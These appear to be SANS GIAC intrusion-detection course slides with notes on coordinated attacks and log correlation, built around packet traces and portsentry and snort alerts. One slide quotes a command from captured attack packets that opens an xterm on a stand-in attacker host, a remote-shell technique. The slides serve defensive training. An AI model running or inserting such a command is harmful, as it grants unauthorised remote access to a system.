1
IDIC – SANS GIAC LevelTwo
©2000, 2001
1
Coordinated Attacks
(multiple attackers working together to
increase their stealth and firepower)
In our final section we are going to examine data from multiple sources. We will begin by
introducing the notion of attackers working together; then we will discuss defenders working
together. From an attacker’s standpoint, there are two primary advantages to coordinated or
distributed attacks:
- Stealth. By working from multiple IP addresses, the attackers are more difficult to detect. In
addition, stealth is enhanced by the development of hard-to-detect probing techniques.
- Firepower. By coordinating multiple attacking IP addresses, the attackers will be able to deliver
more exploits at a target in a smaller time window. The target in this case can be one or more sites.
Further, the defense technique of blocking an attacker site (shunning) will be less effective.
2
IDIC - SANS GIAC LevelTwo
©2000, 2001
2
External Network Mapping
10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12
10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12
10:32:24.801 north.mappem.com.38758 > ns.target.net.33478: udp 12
10:32:24.833 north.mappem.com.38758 > ns.target.net.33479: udp 12
10:32:24.944 north.mappem.com.38758 > ns.target.net.33481: udp 12
10:32:24.975 north.mappem.com.38758 > ns.target.net.33482: udp 12
10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12
10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12
10:32:26.930 south.mappem.com.48412 > ns.target.net.33514: udp 12
10:32:27.033 south.mappem.com.48412 > ns.target.net.33515: udp 12

10:32:27.231 south.mappem.com.48412 > ns.target.net.33517: udp 12
10:32:27.436 south.mappem.com.48412 > ns.target.net.33519: udp 12
10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12
10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12
10:32:26.836 east.mappem.com.58853 > ns.target.net.33494: udp 12
10:32:26.930 east.mappem.com.58853 > ns.target.net.33495: udp 12
10:32:27.033 east.mappem.com.58853 > ns.target.net.33496: udp 12
10:32:27.232 east.mappem.com.58853 > ns.target.net.33498: udp 12
10:32:27.323 east.mappem.com.58853 > ns.target.net.33499: udp 12
Simultaneous Traceroutes
The same technique may also be used for network triangulation and development of network state.
Note the detect times; the traceroutes hit the target, a DNS server, from multiple locations within a
few seconds. This will allow them to have timing data for multiple paths.
They would then be able to use the state information to determine the best route to this site. The
stimulus here was one of the internal hosts visiting a Web server at the ISP. The ISP wants to give
the best possible service, so it runs a packet back from a couple backbones, does some calculations to
determine where the closest server is, and transfers the connection to this server the next time they
click a URL.
3
IDIC - SANS GIAC LevelTwo
©2000, 2001
3
Protected
Network
External Network Mapping
Concept
ISP # 2
ISP # 1
Goal is to determine what machines
make up the external layer of the

protected network.
= Internet Router
Out of band network
Here is the concept in cartoons. From multiple endpoints, you fire packets at a single location from
multiple backbones probably connected via an out of band network.
Note that you gather a lot of information about the space that is outside the target network, and they
are not even aware of that.
Also note that in the end there are a finite number of choke points. This is one of the concerns we
have with this type of information gathering. The state table can be used to give the best possible
service, but it may also be used to orchestrate an attack.
4
IDIC - SANS GIAC LevelTwo
©2000, 2001
4
Searching for Back Orifice
04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19
04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19
04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19
06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19
06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19
06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19
Here is a simple signature, trolling for Back Orifice. But before you relax too much, take a closer
look. In a short time frame, three attackers with the same signature were detected at multiple target
locations. eb may be working independently; this machine was not seen at all the attacked sites. Is
this a coincidence or could the machines be working together? Given the data shown on the slide, it
is hard to say.
Even though they were seen at four different locations at fairly close time intervals, it is not possible
to say they were working together. They could simply have the same attack address list or address
generation algorithm and have started an automated process at the same time.
On the other hand, to rule out that the systems are working together might not be wise. With site A

and site B, do they tend to scan the same addresses? This would be an indication they are using the
same address list. If within A and B they tend to scan DIFFERENT addresses, you have a pattern
worth further study.
5
IDIC - SANS GIAC LevelTwo
©2000, 2001
5
Simultaneous RESET Scans
By Related Addresses
17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0
17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0
17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0
17:43:37.605127 router > hook: icmp: time exceeded in-transit
17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0
17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0
17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0
17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0
17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0
17:47:52.698378 router > grin: icmp: time exceeded in-transit
674719802 is a signature ACK number of a SYN flood. If you are an analyst, you want to put your
quarter on a denial of service attack. For that to be true, both hook and grin would have to be under
attack at the same time.
Are these a stimulus or a response? A RST is a response. If the RST is coming to target1, etc., then
this must have been the source address range used for the denial of service.
Let’s take a conspiracy theory pause. Even if this really is a denial of service attack against hook and
grin, do they get mapping information about this site? They certainly do; the target site is not behind
a NAT and will give out important data. Note the ICMP error messages.
6
IDIC - SANS GIAC LevelTwo
©2000, 2001

6
DNS ZONE Variation
One IP attacks, the second IP receives the data
01:46:06.41 attacker.23616 > target.domain: S 4076745461:4076745461(0)
win 512 <mss 1460>
01:46:06.42 target.domain > attacker.23616: S 208525112
2:2085251122(0) ack 4076745462 win 17520 <mss 1460> (DF)
01:46:07.14 attacker.23616 > target.domain: . ack 1 win 31744 (DF)
01:46:07.34 attacker.23616 > target.domain: P 1:3(2) ack 1 win 31744 (DF)
01:46:07.51 target.domain > attacker.23616: . ack 3 win 17520 (DF)
01:46:07.58 attacker.23616 > target.domain: . 3:1463(1460) ack 1 win
31744 (DF)
01:46:07.61 attacker.23616 > target.domain: P 1463:1563(100) ack 1 win
31744 (DF)
01:46:07.61 attacker.23616 > target.domain: F 1563:1563(0) ack 1 win
31744
Courtesy Pedro Vazquez - Unicamp
In the example above, the attacker scans the net until he finds a DNS server that will respond on 53
TCP. The attacker establishes a connection. There is a data transfer; he then sends attack packets,
including the strings shown on the next slide.
7
IDIC - SANS GIAC LevelTwo
©2000, 2001
7
DNS ZONE Variation (2)
One IP attacks, the second IP receives the data
Courtesy Pedro Vazquez - Unicamp
Content from the attack packets (cleaned up of
8bit chars) sent against the DNS servers (target):
%strings ibm|grep bin

/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
The point of this is to give them terminal access on the DNS server. In this attack, they probe from
one site and then try to open up a remote terminal to a second location. It should be noted this is a
wonderful opportunity to counterattack, but we won’t go there : )
8
IDIC - SANS GIAC LevelTwo
©2000, 2001
8
Correlation
( the current frontier )
• Single sensor coverage is a
computerized form of tunnel vision
• Successful analysis requires:
– Fusing observations from multiple types of
sensors
– Correlating observations from similar
sensors
– Building the answer a piece at a time
In our final section, we want to look at some attacks that have the same event, or a
similar event, shown from more than one log source.
Correlation is one of the most important techniques available to an analyst.
9
IDIC - SANS GIAC LevelTwo
©2000, 2001
9
Manual Correlation Benefits

• Primary key to maintain situational
awareness
• System log file and an alert system
administrator can greatly enhance site’s
detection effectiveness
• Correlating system information with
network logs can help scope the size
and intensity of an event
Within a site, correlating ID sensors and system logs is a powerful tool. With TCP
Wrappers or the equivalent, detection is near real time. If there is an alarming syslog
capability such as swatch, ID sensors can be focused on the connecting host.
As we correlate logs from multiple sources, we get a better and better picture of what is
happening. This is how we can determine how widespread and serious an attack is.
This is how we determine situational awareness. A good analyst should never rely on a
single type of log file.
10
IDIC - SANS GIAC LevelTwo
©2000, 2001
10
Correlation Approach
• Locate secondary sources of data at
your facility (network ID and system
logs)
• To the extent you can, share detect
data with others, source addresses and
detect patterns
• Learn to read a variety of log formats
Many times, a different sensor such as a host log will have additional information than one can get
from a network sensor. However, you have to locate these data sources ahead of time if they are
going to be of any value when you come under attack.

Also, it can take a while to get comfortable with different log formats. We certainly don’t know all
of them, but it really makes sense to know the ones at your facility.
11
IDIC - SANS GIAC LevelTwo
©2000, 2001
11
imhacking.com.4079 > mynetwork.com.21: S 2495131:2495131(0) win 8192
<mss 1460,nop,nop,sackOK> (DF)
mynetwork.com.21 > imhacking.com.4079: S 29790329:29790329(0) ack
2495132 win 8760 <mss 1460> (DF)
imhacking.com.4079 > mynetwork.com.21: . ack 1 win 8760 (DF)
mynetwork.com.21 > imhacking.com.4079: P 1:48(47) ack 1 win 8760 (DF)
imhacking.com.4079 > mynetwork.com.21: P 1:17(16) ack 48 win 16337 (DF)
mynetwork.com.21 > imhacking.com.4079: P 48:86(38) ack 17 win 8744 (DF)
imhacking.com.4079 > mynetwork.com.21: P 17:33(16) ack 86 win 16299
(DF)
mynetwork.com.21 > imhacking.com.4079: P 86:121(35) ack 33 win 8728
(DF)
imhacking.com.4079 > mynetwork.com.21:R2495164:2495164(0) win 0 (DF)
Black Ice Defender: count=5&victim=z.z.z.z&login=anonymous
Two Perspectives
The first example shows a connection to a host with FTP. We see the connection is completed.
Then it is broken off with a RST by the attacker on the last line of the trace.
The second data source here was taken from Black Ice Defender. Notice that this provides additional
information.
12
IDIC - SANS GIAC LevelTwo
©2000, 2001
12
Source Host - Ingreslock

DIAL-A-MATTRESS, NEW YORK, NY, USA
Apr 11 18:21:38 dns1 portsentry[438328]: attackalert:
Connect from host:12.20.24.133/12.20.24.133 to TCP
port: 1524
Apr 11 18:21:40 dns2 portsentry[2259]: attackalert:
Connect from host:12.20.24.133/12.20.24.133 to TCP
port: 1524
Common backdoor port - part one of the story
This detect is taken from the GIAC page, 13-Apr-2000.
These still turn up from time to time. This is simply trolling for an already compromised system.
The attacker breaks in and sets up a port to access later as a back door. 1524 has been a popular one
and is still in use.
This trace used to be listed in the common errors section because so many analysts are satisfied with
any answer. The risk is that an analyst will look this up in a port list and then since they have a
match, they believe the port list. The trick is to understand if the systems are running a service like
ingreslock for a reason, since the attackers put their back door code in and add the entry into the
inetd.conf file.
13
IDIC - SANS GIAC LevelTwo
©2000, 2001
13
PCSERVER - April 2000
DIAL-A-MATTRESS, NEW YORK NY, USA
Apr 12 20:53:58 hosth snort[87556]:
spp_portscan:
PORTSCAN DETECTED from 12.20.24.133
22 connections across 22 hosts:
TCP(22), UDP(0)
Apr 12 20:53:56 12.20.24.133:4973 ->
a.b.e.13:600 SYN **S*****

Apr 12 20:54:01 12.20.24.133:1054 ->
a.b.e.51:600 SYN **S*****
Same source address as ingreslock detect one day later
TCP port 600 is pcserver, a common backdoor, so this is essentially the same problem as ingreslock.
Notice that the two attacks, the one on this slide and the one on the previous slide, are launched by
the same IP address, which is assigned to PC WARE International.
What is going on here? Probably they are looking for ALREADY compromised systems.